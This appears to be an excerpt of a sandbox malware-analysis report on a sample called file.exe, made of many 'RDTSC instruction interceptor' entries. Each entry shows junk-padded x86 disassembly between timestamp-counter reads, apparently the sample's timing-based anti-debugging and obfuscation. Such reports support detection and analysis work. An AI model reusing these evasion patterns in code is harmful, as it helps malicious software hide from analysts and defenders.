Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A60 second address: 5460279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F661D451437h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F662205AAC4h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 mov bx, F7BCh 0x00000039 mov ax, dx 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F661D45143Ch 0x00000043 mov dword ptr [esp], ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ebx, 31AC48F0h 0x0000004e mov bx, 041Ch 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460279 second address: 54602BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F661CE75E8Ch 0x0000000b xor cl, 00000038h 0x0000000e jmp 00007F661CE75E8Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F661CE75E96h 0x0000001e push FFFFFFFEh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602BD second address: 54602C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602C1 second address: 54602C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602C7 second address: 54602F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F661D451439h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, 7C10h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602F1 second address: 54602F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602F6 second address: 546032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661D451442h 0x00000009 add cx, C058h 0x0000000e jmp 00007F661D45143Bh 0x00000013 popfd 0x00000014 mov esi, 6D10610Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546032B second address: 5460335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 69FF28A3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460335 second address: 54603C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F661D451441h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push edx 0x00000016 mov edi, esi 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Fh 0x0000001f adc ax, 91DEh 0x00000024 jmp 00007F661D451449h 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f jmp 00007F661D451441h 0x00000034 pop eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F661D45143Dh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54603C3 second address: 54603F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 jmp 00007F661CE75E93h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push 4E2F1739h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E8Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54603F2 second address: 5460455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661D45143Fh 0x0000000a sbb ch, FFFFFFAEh 0x0000000d jmp 00007F661D451449h 0x00000012 popfd 0x00000013 popad 0x00000014 xor dword ptr [esp], 3B863C49h 0x0000001b jmp 00007F661D45143Eh 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 jmp 00007F661D451440h 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460455 second address: 546045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546045D second address: 546052E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007F661D451447h 0x0000000c adc ecx, 1B322ECEh 0x00000012 jmp 00007F661D451449h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov esi, edx 0x0000001f pushfd 0x00000020 jmp 00007F661D451443h 0x00000025 sub ch, FFFFFFDEh 0x00000028 jmp 00007F661D451449h 0x0000002d popfd 0x0000002e popad 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F661D451443h 0x00000039 sub ax, B6EEh 0x0000003e jmp 00007F661D451449h 0x00000043 popfd 0x00000044 pushfd 0x00000045 jmp 00007F661D451440h 0x0000004a adc cx, 0E68h 0x0000004f jmp 00007F661D45143Bh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546052E second address: 546057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 18h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E8Dh 0x00000014 xor cl, FFFFFF86h 0x00000017 jmp 00007F661CE75E91h 0x0000001c popfd 0x0000001d mov bh, ch 0x0000001f popad 0x00000020 push ebp 0x00000021 pushad 0x00000022 call 00007F661CE75E96h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546057C second address: 546058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 mov dh, al 0x00000008 pop ebx 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546058F second address: 5460593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460593 second address: 54605A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605A4 second address: 54605AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605AA second address: 54605AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605AE second address: 54605DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F661CE75E94h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605DF second address: 5460677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edi, 48F782F4h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F661D45143Ah 0x00000011 xchg eax, esi 0x00000012 jmp 00007F661D451440h 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Eh 0x0000001f jmp 00007F661D451445h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F661D451440h 0x0000002b sub al, 00000038h 0x0000002e jmp 00007F661D45143Bh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov cx, D981h 0x0000003d pushfd 0x0000003e jmp 00007F661D45143Eh 0x00000043 sub si, 7498h 0x00000048 jmp 00007F661D45143Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460677 second address: 54606B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E95h 0x00000014 and eax, 01CC5CE6h 0x0000001a jmp 00007F661CE75E91h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54606B4 second address: 54606FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D451447h 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [75AF4538h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F661D45143Eh 0x0000001b add ax, 4AE8h 0x00000020 jmp 00007F661D45143Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54606FB second address: 5460775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661CE75E8Fh 0x0000000a and ax, 822Eh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 popad 0x00000016 xor dword ptr [ebp-08h], eax 0x00000019 jmp 00007F661CE75E8Eh 0x0000001e xor eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F661CE75E8Ah 0x00000028 pushfd 0x00000029 jmp 00007F661CE75E92h 0x0000002e adc esi, 30459208h 0x00000034 jmp 00007F661CE75E8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460775 second address: 54607E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F661D45143Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 mov ah, F8h 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Bh 0x0000001f adc eax, 4DE0085Eh 0x00000025 jmp 00007F661D451449h 0x0000002a popfd 0x0000002b mov dx, cx 0x0000002e popad 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54607E3 second address: 5460816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661CE75E95h 0x0000000a sub ecx, 4CE25146h 0x00000010 jmp 00007F661CE75E91h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460816 second address: 5460826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460826 second address: 5460862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e jmp 00007F661CE75E97h 0x00000013 mov dword ptr [ebp-18h], esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F661CE75E90h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460862 second address: 5460871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545041F second address: 5450423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450423 second address: 5450429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450429 second address: 545045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 pushfd 0x00000007 jmp 00007F661CE75E8Eh 0x0000000c jmp 00007F661CE75E95h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545045E second address: 5450464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450464 second address: 54504EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E90h 0x00000008 pushfd 0x00000009 jmp 00007F661CE75E92h 0x0000000e xor cx, 6A98h 0x00000013 jmp 00007F661CE75E8Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov dl, EBh 0x00000020 jmp 00007F661CE75E90h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F661CE75E8Eh 0x0000002e adc esi, 2706AC28h 0x00000034 jmp 00007F661CE75E8Bh 0x00000039 popfd 0x0000003a movzx eax, di 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 jmp 00007F661CE75E8Bh 0x00000045 sub esp, 2Ch 0x00000048 pushad 0x00000049 push ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54504EE second address: 54505A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov cx, 5D5Dh 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007F661D451448h 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F661D451441h 0x00000018 add ah, 00000056h 0x0000001b jmp 00007F661D451441h 0x00000020 popfd 0x00000021 push eax 0x00000022 pushfd 0x00000023 jmp 00007F661D451447h 0x00000028 or ah, FFFFFF8Eh 0x0000002b jmp 00007F661D451449h 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 push edi 0x00000036 call 00007F661D451448h 0x0000003b pop eax 0x0000003c pop edx 0x0000003d push eax 0x0000003e push edx 0x0000003f call 00007F661D45143Eh 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54505A0 second address: 54505EE instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b mov esi, 74339B75h 0x00000010 mov si, 79F1h 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F661CE75E8Eh 0x0000001b or ah, FFFFFFC8h 0x0000001e jmp 00007F661CE75E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F661CE75E95h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54505EE second address: 54505F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450606 second address: 545060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545060E second address: 5450614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450614 second address: 5450618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450618 second address: 5450665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 pushfd 0x00000013 jmp 00007F661D451446h 0x00000018 jmp 00007F661D451445h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450665 second address: 545072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007F661CE75E98h 0x00000013 or si, 4BD8h 0x00000018 jmp 00007F661CE75E8Bh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f pushfd 0x00000020 jmp 00007F661CE75E99h 0x00000025 or ax, 6376h 0x0000002a jmp 00007F661CE75E91h 0x0000002f popfd 0x00000030 popad 0x00000031 inc ebx 0x00000032 pushad 0x00000033 movzx ecx, dx 0x00000036 pushfd 0x00000037 jmp 00007F661CE75E99h 0x0000003c xor ch, FFFFFF86h 0x0000003f jmp 00007F661CE75E91h 0x00000044 popfd 0x00000045 popad 0x00000046 test al, al 0x00000048 jmp 00007F661CE75E8Eh 0x0000004d je 00007F661CE7606Dh 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545072C second address: 5450749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54508F2 second address: 54508F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54508F8 second address: 54508FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54508FC second address: 5450981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e jmp 00007F661CE75E96h 0x00000013 lea eax, dword ptr [ebp-2Ch] 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007F661CE75E8Dh 0x0000001e and cx, AC26h 0x00000023 jmp 00007F661CE75E91h 0x00000028 popfd 0x00000029 pop esi 0x0000002a mov edi, 7473A444h 0x0000002f popad 0x00000030 push ebp 0x00000031 jmp 00007F661CE75E98h 0x00000036 mov dword ptr [esp], esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F661CE75E8Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450981 second address: 5450985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450985 second address: 545098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545098B second address: 54509C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D45143Ch 0x00000008 pushfd 0x00000009 jmp 00007F661D451442h 0x0000000e or eax, 692CAA88h 0x00000014 jmp 00007F661D45143Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509C9 second address: 54509CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509CD second address: 54509D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509D3 second address: 54509E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509E8 second address: 5450A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D451445h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A01 second address: 5450A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov di, A4DEh 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E8Fh 0x00000014 sbb ax, 018Eh 0x00000019 jmp 00007F661CE75E99h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F661CE75E8Eh 0x00000026 push eax 0x00000027 jmp 00007F661CE75E8Bh 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F661CE75E95h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A89 second address: 5450A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A8D second address: 5450A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A93 second address: 5450ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F661D451440h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F661D451447h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450ADA second address: 5450023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F668D4C39E4h 0x0000000f xor eax, eax 0x00000011 jmp 00007F661CE4F5BAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007F661CE75E87h 0x0000002b jmp 00007F661CE75FFBh 0x00000030 call 00007F6621A6F125h 0x00000035 mov edi, edi 0x00000037 jmp 00007F661CE75E97h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov ax, dx 0x00000043 push edi 0x00000044 pop ecx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450023 second address: 5450036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450036 second address: 545003A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545003A second address: 545009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ah, 52h 0x0000000c pushfd 0x0000000d jmp 00007F661D451447h 0x00000012 adc ax, 4CDEh 0x00000017 jmp 00007F661D451449h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F661D451448h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545009B second address: 545009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545009F second address: 54500A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54500A5 second address: 54500B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54500B6 second address: 54500CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
